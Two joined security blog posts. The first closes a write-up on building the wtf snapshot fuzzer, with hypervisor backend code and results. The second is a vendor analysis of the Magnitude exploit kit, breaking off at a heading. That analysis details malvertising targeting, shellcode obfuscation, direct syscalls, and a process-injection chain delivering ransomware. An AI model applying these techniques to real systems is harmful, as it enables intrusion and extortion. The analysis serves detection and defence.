  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore the content of each page. Internally, the class checks if the page has been duplicated and, if so, restores it from this copy. If it doesn't have a copy, it restores the content from the dump file. This lets us restore code coverage breakpoints at the cost of some extra memory:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}
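Putting it together, the restore path ends up being a simple loop over the dirty GPAs; the member names in the sketch below are hypothetical:

//
// Restore sketch (hypothetical member names): walk the GPAs dirtied during
// the run and let Ram_t put every page back to its pre-execution content,
// code coverage breakpoints included.
//

void RestoreDirtyMemory() {
  for (const Gpa_t DirtyGpa : DirtyGpas_) {
    Ram_.Restore(DirtyGpa);
  }

  DirtyGpas_.clear();
}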

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique, but I encountered a pretty annoying bug where IDA tagged a switch-table as code instead of data. This led to wtf corrupting the switch-table with cc's, which made the guest crash in spectacular ways.

I haven't run into this bug with the latest version of IDA yet, which is nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and tracking dirtiness myself when receiving a memory fault caused by a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once that was fixed, I noticed that WHvTranslateGva was also slower than I expected, so I emulated its behavior too by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I honestly was a bit disappointed as I expected more of a 100x improvement, but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes, which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up.

I didn't know anything about those VMMs but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. The KVM API powers Firecracker, a project creating micro VMs to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of this project.

The KVM API works very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of a guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);

//
// Note: mmap signals failure with MAP_FAILED, not nullptr.
//

if (Run_ == (struct kvm_run *)MAP_FAILED) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
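The GPR part specifically relies on the sync regs mechanism: if KVM_CAP_SYNC_REGS is available, you can ask KVM to mirror the registers into this mapping on every exit instead of issuing KVM_GET_REGS ioctls. Here is a minimal sketch of the pattern (it assumes the capability has been checked beforehand):

//
// Sketch (assumes KVM_CAP_SYNC_REGS has been checked): have the kernel
// synchronize the GPRs into the shared kvm_run mapping so that they can be
// read without a KVM_GET_REGS round-trip.
//

uint64_t RunAndReadRax(struct kvm_run *Run, const int Vp) {
  //
  // Request the GPRs to be mirrored into Run->s.regs on the next exit..
  //

  Run->kvm_valid_regs = KVM_SYNC_X86_REGS;

  if (ioctl(Vp, KVM_RUN, 0) < 0) {
    perror("KVM_RUN");
    return 0;
  }

  //
  // ..and read @rax straight out of the shared mapping.
  //

  return Run->s.regs.regs.rax;
}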

On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd, so you can just start a thread that polls the fd and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the poll fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll fails with EINTR when we are trying to kick the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
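The part not shown above is the setup: the userfaultfd has to be created, the API handshaked, and the guest RAM range registered in missing-page mode so that the thread receives the faults. Below is a sketch of that registration with hypothetical variable names:

//
// Registration sketch (hypothetical names): create the userfaultfd,
// handshake the API and register the guest RAM range in missing-page mode.
//

#include <cstdint>
#include <cstdio>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

int RegisterRamWithUffd(void *RamHva, const uint64_t RamSize) {
  const int Uffd = syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  if (Uffd < 0) {
    perror("userfaultfd");
    return -1;
  }

  //
  // Handshake the API version with the kernel.
  //

  struct uffdio_api Api = {.api = UFFD_API, .features = 0};
  if (ioctl(Uffd, UFFDIO_API, &Api) < 0) {
    perror("UFFDIO_API");
    return -1;
  }

  //
  // Register the RAM range; missing-page events end up in the polling thread.
  //

  struct uffdio_register Register = {
      .range = {.start = uint64_t(RamHva), .len = RamSize},
      .mode = UFFDIO_REGISTER_MODE_MISSING,
  };

  if (ioctl(Uffd, UFFDIO_REGISTER, &Register) < 0) {
    perror("UFFDIO_REGISTER");
    return -1;
  }

  return Uffd;
}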

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When it does, I am able to program the PMU to trigger an interruption after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interruption called a PMI that gets delivered via the vector 0xFE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit, and I remember struggling to get the interruption to fire. I am still not 100% sure that I got the details fully right, but the interruption triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.
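For the curious, programming the fixed counter itself is just a handful of MSR writes that can be pushed into the guest with KVM_SET_MSRS. The sketch below is only an illustration and rests on a few assumptions (a 48-bit wide counter, the standard fixed-counter MSR indices, and a Vp vcpu fd); it is not wtf's actual code:

//
// Illustration only (see the assumptions above): preload IA32_FIXED_CTR0 so
// that it overflows, and thus fires a PMI, after `Limit` retired
// instructions.
//

#include <cstdint>
#include <cstdio>
#include <linux/kvm.h>
#include <sys/ioctl.h>

constexpr uint32_t MsrIa32FixedCtr0 = 0x309;
constexpr uint32_t MsrIa32FixedCtrCtrl = 0x38d;
constexpr uint32_t MsrIa32PerfGlobalCtrl = 0x38f;

bool ArmInstructionLimit(const int Vp, const uint64_t Limit) {
  struct {
    kvm_msrs Header;
    kvm_msr_entry Entries[3];
  } Msrs = {};

  Msrs.Header.nmsrs = 3;

  //
  // Preload the counter; it is assumed to be 48 bits wide.
  //

  Msrs.Entries[0] = {.index = MsrIa32FixedCtr0, .data = (1ULL << 48) - Limit};

  //
  // Enable fixed counter 0 in ring 0 & ring 3 and turn on its PMI (bits 0, 1
  // and 3 of IA32_FIXED_CTR_CTRL)..
  //

  Msrs.Entries[1] = {.index = MsrIa32FixedCtrCtrl, .data = 0b1011};

  //
  // ..and enable the counter globally (bit 32 of IA32_PERF_GLOBAL_CTRL).
  //

  Msrs.Entries[2] = {.index = MsrIa32PerfGlobalCtrl, .data = 1ULL << 32};

  if (ioctl(Vp, KVM_SET_MSRS, &Msrs) != int(Msrs.Header.nmsrs)) {
    perror("KVM_SET_MSRS");
    return false;
  }

  return true;
}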

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful, so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had SKUs available with nested virtualization on. I rented one of them to try it out, but the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be there, so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about $100 / month. The CPU was a Xeon E3-1270v6, 4 cores / 8 threads @ 3.8GHz, which seemed good enough for my usage. The hardware had a PMU, and that is also where I developed wtf's support for it.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case generated executions of around 195 million instructions, with the following stats (collected by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELF files possible. This corpus was made of 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can think of the clients as runners that send their results back to the server. All the important state is kept in the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf, a distributed, code-coverage-guided, customizable, cross-platform, snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereferences, stack overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.

[Figure: bounty.png]

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to Lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

[Figure: elf64.png]

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend you try out their bounty program as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Magnitude Exploit Kit: Still Alive and Kicking

29 July 2021 at 16:30

If I could choose one computer program and erase it from existence, I would choose Internet Explorer. Switching to a different browser would most likely save countless people from getting hacked. Not to mention all the headaches that web developers get when they are tasked with solving Internet Explorer compatibility issues. Unfortunately, I do not have the power to make Internet Explorer disappear. But seeing its browser market share continue to decline year after year at least gives me hope that one day it will be only a part of history.

While the overall trend looks encouraging, there are still some countries where the decline in Internet Explorer usage is lagging behind. An interesting example of this is South Korea, where until recently, users often had no choice but to use this browser if they wanted to visit a government or an e-commerce website. This was because of a law that seems very bizarre from today’s point of view: these websites were required to use ActiveX controls and were therefore only supported in Internet Explorer. Ironically, these controls were originally meant to provide additional security. While this law was finally dismantled in December 2020, Internet Explorer still has a lot of momentum in South Korea today. 

The attackers behind the Magnitude Exploit Kit (or Magniťůdek as we like to call it) are exploiting this momentum by running malicious ads that are currently shown only to South Korean Internet Explorer users. The ads can mostly be found on adult websites, which makes this an example of so-called adult malvertising. They contain code that exploits known vulnerabilities in order to give the attackers control over the victim’s computer. All the victim has to do is use a vulnerable version of Microsoft Windows and Internet Explorer, navigate to a page that hosts one of these ads and they will get the Magniber ransomware encrypting their computer.

The daily number of Avast users protected from Magnitude. Note the drop after July 9th, which is when the attacker’s account at one of the abused ad networks got terminated.

Overview

The Magnitude exploit kit, originally known as PopAds, has been around since at least 2012, which is an unusually long lifetime for an exploit kit. However, it’s not the same exploit kit today that it was nine years ago. Pretty much every part of Magnitude has changed multiple times since then. The infrastructure has changed, so has the landing page, the shellcode, the obfuscation, the payload, and most importantly, the exploits. Magnitude currently exploits an Internet Explorer memory corruption vulnerability, CVE-2021-26411, to get shellcode execution inside the renderer process and a Windows memory corruption vulnerability, CVE-2020-0986, to subsequently elevate privileges. A fully functional exploit for CVE-2021-26411 can be found on the Internet and Magnitude uses that public exploit directly, just with some added obfuscation on top. According to the South Korean cybersecurity company ENKI, this CVE was first used in a targeted attack against security researchers, which Google’s Threat Analysis Group attributed to North Korea.

Exploiting CVE-2020-0986 is a bit less straightforward. This vulnerability was first used in a zero-day exploit chain, discovered in-the-wild by Kaspersky researchers who named the attack Operation PowerFall. To the best of our knowledge, this is the first time this vulnerability is being exploited in-the-wild since that attack. Details about the vulnerability were provided in blog posts by both Kaspersky and Project Zero. While both these writeups contain chunks of the exploit code, it must have still been a lot of work to develop a fully functional exploit. Since the exploit from Magnitude is extremely similar to the code from the writeups, we believe that the attackers started from the code provided in the writeup and then added all the missing pieces to get a working exploit.

Interestingly, when we first discovered Magnitude exploiting CVE-2020-0986, it was not weaponized with any malicious payload. All it did after successful exploitation was ping its C&C server with the Windows build number of the victim. At the time, we theorized that this was just a testing version of the exploit and the attackers were trying to figure out which builds of Windows they could exploit before they fully integrated it into the exploit kit. And indeed, a week later we saw an improved version of the exploit and this time, it was carrying the Magniber ransomware as the payload.

Until recently, our detections for Magnitude were protecting on average about a thousand Avast users per day. That number dropped to roughly half after the compliance team of one of the ad networks used by Magnitude kicked the attackers out of their platform. Currently, all the protected users have a South Korean IP address, but just a few weeks back, Taiwanese Internet users were also at risk. Historically, South Korea and Taiwan were not the only countries attacked by Magnitude. Previous reports mention that Magnitude also used to target Hong Kong, Singapore, the USA, and Malaysia, among others. 

The Infrastructure

The Magnitude operators are currently buying popunder ads from multiple adult ad networks. Unfortunately, these ad networks allow them to very precisely target the ads to users who are likely to be vulnerable to the exploits they are using. They can only pay for ads shown to South Korean Internet Explorer users who are running selected versions of Microsoft Windows. This means that a large portion of users targeted by the ads is vulnerable and that the attackers do not have to waste much money on buying ads for users that they are unable to exploit. We reached out to the relevant ad networks to let them know about the abuse of their platforms. One of them successfully terminated the attacker’s account, which resulted in a clear drop in the number of Avast users that we had to protect from Magnitude every day.

Many ad networks allow the advertisers to target their ads only to IE users running specific versions of Windows.

When the malicious ad is shown to a victim, it redirects them through an intermediary URL to a page that serves an exploit for CVE-2021-26411. An example of this redirect chain is binlo[.]info -> fab9z1g6f74k.tooharm[.]xyz -> 6za16cb90r370m4u1ez.burytie[.]top. The first domain, binlo[.]info, is the one that is visible to the ad network. When this domain is visited by someone not targeted by the campaign, it just presents a legitimate-looking decoy ad. We believe that the purpose of this decoy ad is to make the malvertising seem legitimate to the ad network. If someone from the ad network were to verify the ad, they would only see the decoy and most likely conclude that it is legitimate.

One of the decoy ads used by Magnitude. Note that this is nothing but a decoy: there is no reason to believe that SkinMedica would be in any way affiliated with Magnitude.

The other two domains (tooharm[.]xyz and burytie[.]top) are designed to be extremely short-lived. In fact, the exploit kit rotates these domains every thirty minutes and doesn’t reuse them in any way. This means that the exploit kit operators need to register at least 96 domains every day! In addition to that, the subdomains (fab9z1g6f74k.tooharm[.]xyz and 6za16cb90r370m4u1ez.burytie[.]top) are uniquely generated per victim. This makes the exploit kit harder to track and protect against (and more resilient against takedowns) because detection based on domain names is not very effective.

The JavaScript exploit for CVE-2021-26411 is obfuscated with what appears to be a custom obfuscator. The obfuscator is updated semi-regularly, most likely in an attempt to evade signature-based detection. It is polymorphic, so each victim gets a uniquely obfuscated exploit. Other than that, there are not many interesting things to say about the obfuscation; it does the usual things like hiding string/numeric constants, renaming function names, hiding function calls, and more.

A snippet of the obfuscated JavaScript exploit for CVE-2021-26411

After deobfuscation, this exploit is an almost exact match to a public exploit for CVE-2021-26411 that is freely available on the Internet. The only important change is in the shellcode, where Magnitude obviously provides its own payload. 

Shellcode

The shellcode is sometimes wrapped in a simple packer that uses redundant jmp instructions for obfuscation. This obfuscates every function by randomizing the order of instructions and then adding a jmp instruction between each two consecutive instructions to preserve the original control flow. As with other parts of the shellcode, the order is randomly generated on the fly, so each victim gets a unique copy of the shellcode.

Function obfuscated by redundant jmp instructions. It allocates memory by invoking the NtAllocateVirtualMemory syscall.

As shown in the above screenshot, the exploit kit prefers not to use standard Windows API functions and instead often invokes system calls directly. The function above uses the NtAllocateVirtualMemory syscall to allocate memory. However, note that this exact implementation only works on Windows 10 under the WoW64 subsystem. On other versions of Windows, the syscall numbers are different, so the syscall number 0x18 would denote some other syscall. This exact implementation also wouldn't work on native 32-bit Windows, because there it does not make sense to call the FastSysCall pointer at FS:[0xC0].

To get around these problems, this shellcode comes in several variants, each custom-built for a specific version of Windows. Each variant then contains hardcoded syscall numbers fitting the targeted version. Magnitude selects the correct shellcode variant based on the User-Agent string of the victim. But sometimes, knowing the major release version and bitness of Windows is not enough to deduce the correct syscall numbers. For instance, the syscall number for NtOpenProcessToken on 64-bit Windows 10 differs between versions 1909 and 20H2. In such cases, the shellcode obtains the victim’s exact NtBuildNumber from KUSER_SHARED_DATA and uses a hardcoded mapping table to resolve that build number into the correct syscall number. 
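As a side note, reading NtBuildNumber does not require any API call because KUSER_SHARED_DATA is mapped at a fixed address in every process. Here is a minimal sketch of the mechanism (the 0x260 offset matches the Windows 10 layout and should be treated as an assumption; this is an illustration, not the shellcode itself):

//
// Minimal sketch: KUSER_SHARED_DATA is mapped at 0x7ffe0000 in every process
// and, on Windows 10, NtBuildNumber lives at offset 0x260 (assumed layout).
//

#include <cstdint>

uint32_t GetNtBuildNumber() {
  const auto *KuserSharedData = reinterpret_cast<const uint8_t *>(0x7ffe0000);
  return *reinterpret_cast<const uint32_t *>(KuserSharedData + 0x260);
}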

Currently, there are only three variants of the shellcode. One for Windows 10 64-bit, one for Windows 7 64-bit, and one for Windows 7 32-bit. However, it is very much possible that additional variants will get implemented in the future.

To facilitate frequent syscall invocation, the shellcode makes use of what we call syscall templates. Below, you can see the syscall template it uses in the WoW64 Windows 10 variant. Every time the shellcode is about to invoke a syscall, it first customizes this template for the syscall it intends to invoke by patching the syscall number (the immediate in the first instruction) and the immediates from the retn instructions (which specify the number of bytes to release from the stack on function return). Once the template is customized, the shellcode can call it and it will invoke the desired syscall. Also, note the branching based on the value at offset 0x254 of the Process Environment Block. This is most likely the malware authors trying to check a field sometimes called dwSystemCallMode to find out if the syscall should be invoked directly using int 0x2e or through the FastSysCall transition.

Syscall template from the WoW64 Windows 10 variant

Now that we know how the shellcode is obfuscated and how it invokes syscalls, let’s get to what it actually does. Note that the shellcode expects to run within the IE’s Enhanced Protected Mode (EPM) sandbox, so it is relatively limited in what it can do. However, the EPM sandbox is not as strict as it could be, which means that the shellcode still has limited filesystem access, public network access and can successfully call many API functions. Magnitude wants to get around the restrictions imposed by the sandbox and so the shellcode primarily functions as a preparation stage for the LPE exploit which is intended to enable Magnitude to break out of the sandbox.

The first thing the shellcode does is that it obtains the integrity level of the current process. There are two URLs embedded in the shellcode and the integrity level is used to determine which one should be used. Both URLs contain a subdomain that is generated uniquely per victim and are protected so that only the intended victim will get any response from them. If the integrity level is Low or Untrusted, the shellcode reaches out to the first URL and downloads an encrypted LPE exploit from there. The exploit is then decrypted using a simple xor-based cipher, mapped into executable memory, and executed.

On the other hand, if the integrity level is Medium or higher, the shellcode determines that it is not running in a sandbox and it skips the LPE exploit. In such cases, it downloads the final payload (currently Magniber ransomware) from the second URL, decrypts it, and then starts searching for a process that it could inject this payload into. For the 64-bit Windows shellcode variants, the target process needs to satisfy all of the following conditions:

  • The target process name is not iexplore.exe
  • The integrity level of the target process is not Low or Untrusted
  • The integrity level of the target process is not higher than the integrity level of the current process
  • The target process is not running in the WoW64 environment
  • (The target process can be opened with PROCESS_QUERY_INFORMATION)

Once a suitable target process is found, the shellcode jumps through the Heaven’s Gate (only in the WoW64 variants) and injects the payload into the target process using the following sequence of syscalls: NtOpenProcess -> NtCreateSection -> NtMapViewOfSection -> NtCreateThreadEx -> NtGetContextThread -> NtSetContextThread -> NtResumeThread. Note that in this execution chain, everything happens purely in memory and this is why Magnitude is often described as a fileless exploit kit. However, the current version is not entirely fileless because, as will be shown in the next section, the LPE exploit drops a helper PE file to the filesystem.

The shellcode’s transition through the heaven’s gate

CVE-2020-0986

